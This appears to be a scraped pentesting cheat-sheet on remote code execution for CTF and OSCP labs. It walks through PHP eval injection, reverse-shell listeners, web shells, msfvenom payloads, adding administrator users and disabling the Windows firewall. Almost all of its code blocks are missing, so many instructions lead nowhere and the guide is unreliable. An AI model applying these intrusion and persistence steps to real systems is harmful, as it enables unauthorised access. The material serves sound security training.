Remote code execution
Remote code execution (RCE), also known as code injection, refers to an attacker executing commands on a system from a remote machine. Often this means exploiting a web application/server to run comma
Last updated
Remote code execution (RCE), also known as code injection, refers to an attacker executing commands on a system from a remote machine. Often this means exploiting a web application/server to run comma
Last updated
The following php snippet will take the GET parameter code and run it through the eval() function without any input sanitization:
The eval() function evaluates the contents as php code, which means we can provide any php code as an argument. The code injection would look like this:
You might also be able to execute single-line system commands like system('id');. For multi-line system commands, use shell_exec:
This method is useful for both system enumeration and shell injection. Make sure to use absolute paths for calling system files, or the web application may not find them.
For most lab or CTF environments, the goal is to get some kind of command shell on the machine for further exploitation. Sometimes this simply means discovering SSH or remote desktop credentials and logging in. Other times, it's exploiting a web application to generate a reverse shell that connects to your attack machine and waits for instructions.
In real life I'm not sure how often reverse shells really happen, but they're fun to pull off in the lab.
If shells are a new concept, this is a good primer.
Your attack machine needs to have a listener running to catch a reverse shell connection. Make sure you specify the IP address of your attack machine and use a port that doesn't already have a service listening. If you need to use python SimpleHTTPServer or similar to transfer exploits, make sure that isn't running on the same port.
Using ports 80 or 443 will help you get around egress filtering:
You may prefer a Meterpreter listener if you're connecting to a Windows machine and want to take advantage of commands like getsystem, or you want to use local Metasploit exploits once you've connected to the remote machine.
Avoid using port 4444 since that is widely recognized as a Metasploit port:
Assuming you are able to put a file on the web server or edit an existing one (e.g. CMS template) this is the simplest type of shell:
You can use it for system commands:
You can also use it to create a reverse shell:
This PHP web shell from pentestmonkey is nice. Make sure to change the following variables before uploading:
As with the PHP shell, change the following variables in your Perl shell:
I rarely use Perl shells. One time, I tried to call a Perl reverse shell in the filesystem using this web server exploit. The reverse shell didn't fire with a .pl extension, but worked fine when I used a .cgi extension. Setting correct permissions using chmod 755 [file] may have also helped.
If you're able to access a Tomcat server's management interface, you can generate and upload a WAR file:
You can fire the shell by clicking on the link in Tomcat's management interface, or by going to the appropriate URL (e.g. http://[host]/shell/)
Meterpreter is good for catching Windows shells, but it's good to practice doing them manually (e.g. because OSCP restricts Metasploit use). You can use msfvenom to generate a non-staged payload that can be caught by a netcat listener:
A non-staged payload is sent in one hit, which is why it can be caught by a netcat listener. A staged payload is sent in small pieces, which is why Metasploit needs to be used.
To create a staged payload and catch the shell using Metasploit's /exploit/multi/handler:
Apparently /exploit/multi/handler is allowed on the OSCP exam, but this isn't much of an advantage if you can't use Meterpreter or Metasploit's local exploits. But if you don't have a lot of space for the payload, staging it is an option.
You will use this line pretty often to fix your shells:
To improve the shell further, use Ctrl + Z to background the reverse shell, then in your local machine run:
Then type reset and hit Enterfor a fully interactive reverse shell.
If the shell dimensions are wrong, background the reverse shell again with Ctrl + Z, go to your local machine and run:
This should return two numbers, which are the number of rows and columns in your terminal. Assuming these numbers are 48 120, return to your victim machine’s shell and run:
Windows is a little weird. If you encounter an IIS server, you can use msfvenom to create an .asp or .aspx payload, as described above. You can also attempt to upload nc.exe (remember to set binary mode if you use ftp), then run:
You can download nc.exe from here.
If RDP is enabled (port 3389), you might be able to create a user and add them to the “Remote Desktop Users” group, then log in via remote desktop.
Add a user on Windows:
Add a user to the “Remote Desktop Users” group:
Make a user an Administrator:
Disable Windows firewall on newer versions:
Disable windows firewall on older windows:
